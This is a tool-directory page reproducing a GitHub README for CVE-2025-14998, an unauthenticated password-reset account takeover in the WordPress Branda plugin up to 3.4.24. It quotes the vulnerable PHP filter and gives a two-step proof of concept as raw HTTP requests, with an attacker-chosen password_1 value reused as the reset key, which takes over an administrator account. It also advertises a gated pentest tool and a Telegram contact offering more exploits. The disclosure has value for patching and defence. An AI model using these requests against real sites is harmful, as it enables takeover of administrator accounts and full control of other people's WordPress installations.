Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/ktn1990/cve-2025-14998
Password AttacksVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAuthentication
GitHubktn1990/cve-2025-14998

CVE-2025-14998

CVE-2025-14998 Wordpress Plugin - Branda – White Label & Branding, Free Login Page Customizer <= 3.4.24 - Unauthenticated Privilege Escalation via Account Takeover

View Repository
228 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Wordpress Branda – White Label & Branding, Free Login Page Customizer <= 3.4.24 - Unauthenticated Privilege Escalation via Account Takeover

CVE-2025-14998 The Branda plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.4.24. This is due to the plugin not properly validating a user's identity prior to updating their password. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account.

For more wordpress vulnerabilities and exclusive pentest tools contact me on telegram @KtN1990.

🔍 Root Cause Analysis

The plugin overrides WordPress’s password generation logic by hooking into the random_password filter. Instead of allowing WordPress to generate a secure random password, the plugin replaces it with user-controlled input.

Vulnerable Code

root@kitploit:~
public function password_random_password_filter( $password ) {
    global $wpdb, $signup_password_use_encryption;

    if ( isset( $_GET['key'] ) && ! empty( $_GET['key'] ) ) {
        $key = $_GET['key'];
    } elseif ( isset( $_POST['key'] ) && ! empty( $_POST['key'] ) ) {
        $key = $_POST['key'];
    }

    if ( ! empty( $_POST['password_1'] ) ) {
        $password = $_POST['password_1'];
    } elseif ( ! empty( $key ) ) {
        $signup = $wpdb->get_row(
            $wpdb->prepare(
                "SELECT * FROM $wpdb->signups WHERE activation_key = '%s'",
                $key
            )
        );

        if ( ! ( empty( $signup ) || $signup->active ) ) {
            $meta = maybe_unserialize( $signup->meta );

            if ( ! empty( $meta['password'] ) ) {
                if ( 'yes' === $signup_password_use_encryption ) {
                    $password = $this->password_decrypt( $meta['password'] );
                } else {
                    $password = $meta['password'];
                }
            }
        }
    }

    return $password;
}

🧪 Proof of Concept (Sanitized)

Step 1 — Trigger Password Reset with Arbitrary Password

root@kitploit:~
POST /wp/wp-login.php?action=lostpassword HTTP/1.1
Host: example.local
Content-Type: application/x-www-form-urlencoded

user_login=admin&
redirect_to=&
password_1=EfUSmvnTun5XbvE6RvIB&
wp-submit=Get+New+Password

The value of password_1 can be any attacker-controlled string.


Step 2 — Complete Reset Using the Same Value as the Reset Key

root@kitploit:~
GET /wp/wp-login.php?login=admin&key=EfUSmvnTun5XbvE6RvIB&action=rp HTTP/1.1
Host: example.local

✅ Result

  • WordPress accepts the attacker-controlled password
  • The administrator password is changed
  • The attacker can authenticate as the affected user

No email access or valid password reset token is required.


💥 Impact

An unauthenticated attacker can:

  • Reset passwords for any WordPress user
  • Take over administrator accounts
  • Gain full control of the WordPress installation
  • Modify plugins, themes, or content

Contact

  • @KtN1990

More vulnerabilities, Check Megatron!

Logo

  • 💣 What is Megatron? Megatron is an advanced penetration testing tool designed for serious testers and red teamers. Whether you're auditing, scanning, or testing infrastructures, Megatron gives you the power you need.

-🛡️ Ideal for: – Security researchers – Penetration testers – Ethical hackers

  • 📦 aintained line with ~230 legacy research modules; recent scanner core improvements for stability and detection.

  • 🎯 Purpose: Provided strictly for authorized security testing, education, defensive research, and red-team training. This release is not for unlawful use. Distribution is gated — access only after verification and a signed Responsible Use Agreement / NDA.

-🛡 Responsible access policy (summary):

  1. Access only to verified security professionals, corporate security teams, accredited labs, or training providers.
  2. You must provide org name, role, official email (corporate), and lawful purpose.
  3. Full download granted only after verification and signing our Responsible Use Agreement / NDA.
  4. Zero tolerance for misuse — evidence of malicious use results in revocation and reporting where required.
  • 📩 Contact / Requests / Verification: @KtN1990 — include organization, role, and short reason for access. Telegram Channel

Demo

IMAGE ALT TEXT HERE

License

MIT

Download Tool